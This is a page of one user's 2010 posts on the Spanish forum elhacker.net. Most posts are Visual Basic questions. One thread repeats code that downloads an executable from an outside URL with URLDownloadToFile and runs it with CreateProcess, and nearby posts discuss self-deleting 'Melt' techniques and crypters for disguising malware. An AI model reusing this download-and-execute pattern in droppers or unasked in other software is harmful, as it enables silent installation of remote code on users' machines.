elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 [14] 15 16 17
131  Programación / Programación Visual Basic / Re: ¿portabilidad del FileSystemObject? en: 27 Marzo 2010, 02:04 am
Gracias...!!!!!!!! ;D ;D ;D ;D 
132  Seguridad Informática / Análisis y Diseño de Malware / Re: [Taller] Así funcionan los crypters: cifrando malware a mano en: 26 Marzo 2010, 21:53 pm
wowww...guapo manual  Hacker_Zero ..¿ pero y la continuación ? generalmente los buenos  aportes quedan sin su segunda parte ...espero k sea este sea la excepcion ...¿ cifrar todo el ejecutalbe menos la header?  ¿ y asi vapulean al ASM ?
133  Programación / Programación Visual Basic / ¿portabilidad del FileSystemObject? en: 26 Marzo 2010, 19:47 pm
 ;D Hello camaradas....bueno me gustaria saber acerca de la portabilidad del FileSystemObject..bueno a mi entender es referencia a la dll scrrun.dll de system32...¿esta dll viene por defecto en  windows XP..?  o es k me la tengo k cargar...necesariamente ?..Me es mas facil trabajar usando FileSystemObject y me ahorra varios dolores de cabeza...
134  Programación / Programación Visual Basic / Re: Descargar y Ejecutar EXE en: 22 Marzo 2010, 18:51 pm
Bueno no lo comprendo...debe ser un problema en la descarga me imagino eso de descargar y ejecutar se ve muy sospechoso..

Gracias BlackZeroX▓▓▒▒░░ me ha servido tu idea...me funciona a la perfeccion
solo te tengo una pregunta  ¿el codigo que mencionas es portable,...o necesito cargar con alguna libreria o ocx en particular? digo esto porque no quisiera bindear alguna libreria...
 

 
135  Programación / Programación Visual Basic / Re: (ayuda)como hago programa q se borre a si mismo?? en: 22 Marzo 2010, 17:00 pm
Gracias Karcrack es una buena tecnica la del Melt...la estoy usando pero lamentablemente ,te soy sincero ,no la entiendo..si pudieras explicar como lo hace y en k se basa... ¿lo borra completamente? ¿a que te refieres con  "auto-eliminado en toda regla" cuando mensionas otra tecnica en ASM?
136  Programación / Programación Visual Basic / Re: Descargar y Ejecutar EXE en: 22 Marzo 2010, 16:29 pm
Bueno...no he encontrado la respuesta a este dilema...lo unico que me queda es crear un bat para que  ejecute el archivo descargado...
137  Programación / Programación Visual Basic / Re: Descargar y Ejecutar EXE en: 20 Marzo 2010, 01:50 am
Upps lo siento  ;D ;D bueno el codigo basicamente es esto..y en forma aislada funciona normalmente
Código:
 
DescargarActualizacion ("http://dddft.es/B.exe") ' Descargo mi file

Dim pInfo As PROCESS_INFORMATION  ' Ejecuto el file
         Dim sInfo As STARTUPINFO
         Dim sNull As String
         Dim lSuccess As Long
         Dim lRetValue As Long

         sInfo.cb = Len(sInfo)
         lSuccess = CreateProcess(sNull, _
                                 App.Path + "\B.exe", _
                                 ByVal 0&, _
                                 ByVal 0&, _
                                 1&, _
                                 NORMAL_PRIORITY_CLASS, _
                                 ByVal 0&, _
                                 sNull, _
                                 sInfo, _
                                 pInfo)

Sub DescargarActualizacion(Url As String)
    Call URLDownloadToFile(0, Url, App.Path & "\B.exe", 0, 0)
End Sub


El archivo se descarga completamente lo se pork al terminar el programa manualmente recien aparece el icon del exe descargado..y se comporta normalmente
Es como si el archivo siguiera abierto en modo de escritura binaria y esperara que el proceso se acabe para cerrarse.
Incluso he llegado a suspender la ejecucion unos segundos para el proceso  se de un respiro y luego ejecute el exe pero nada...
 
138  Programación / Programación Visual Basic / Re: Descargar y Ejecutar EXE en: 20 Marzo 2010, 00:26 am
Bueno gracias por el interes alli va :

DescargarActualizacion ("http://dddft.es/B.exe") ' Descargo mi file

Dim pInfo As PROCESS_INFORMATION  ' Ejecuto el file
         Dim sInfo As STARTUPINFO
         Dim sNull As String
         Dim lSuccess As Long
         Dim lRetValue As Long

         sInfo.cb = Len(sInfo)
         lSuccess = CreateProcess(sNull, _
                                 App.Path + "\B.exe", _
                                 ByVal 0&, _
                                 ByVal 0&, _
                                 1&, _
                                 NORMAL_PRIORITY_CLASS, _
                                 ByVal 0&, _
                                 sNull, _
                                 sInfo, _
                                 pInfo)

 
 Tambien he usado :

Dim xx As Long
xx = ShellExecute(Me.hwnd, "Open", App.Path + "\B.exe", &Afro, &Afro, SW_NORMAL)

Pero  la descargar el archivo exe , sale sin su icnono asociado, y recien cuando termino el programa  recien se ve el icono y alli recien se peude ejecutar (manualmente claro)
139  Programación / Programación Visual Basic / Descargar y Ejecutar EXE en: 20 Marzo 2010, 00:14 am
Hola
Estoy descargando un archivo usando URLDownloadToFile y como es un proceso asincrono una vez terminado la descarga (o mejor dicho en la siguiente linea ) lo ejecuto usando la api CreateProcess pero sin embargo no se ejecuta :No obstante el archivo si ha llegado a descargarse completamente y solo lo puedo ejecutar cuando termino el programa...He oido que los antivirus  bloquen este proceso pero a mi no me ha saltado ni un aviso ni nada parecido..¿Alguna idea? O es k tengo que crearle un Bat o algo parecido..Gracias  :silbar:
140  Programación / PHP / Incorporar gestores de pago con PHP en: 12 Marzo 2010, 23:13 pm
Saludos brothers

Sigo trabajando en una pequeña aplicacion...y quisiera incorporarle una gestor de pagos...lo he pensado y no parece muy complicado una tabla de usuarios y otra de pagos y sus respetivas verificaciones...para tener acceso total a mi pag .web

Mi problema seria acerca de las pasarelas de pago a usar , pense desde WesterUnion, Money Gram, etc ¿Que campos tendria que haber en mi tabla pagos
? ¿existe script que me ayude en esto?..
 ;D ;D Agradezco infinitamente sus ideas y comentarios de antemano
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 [14] 15 16 17
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines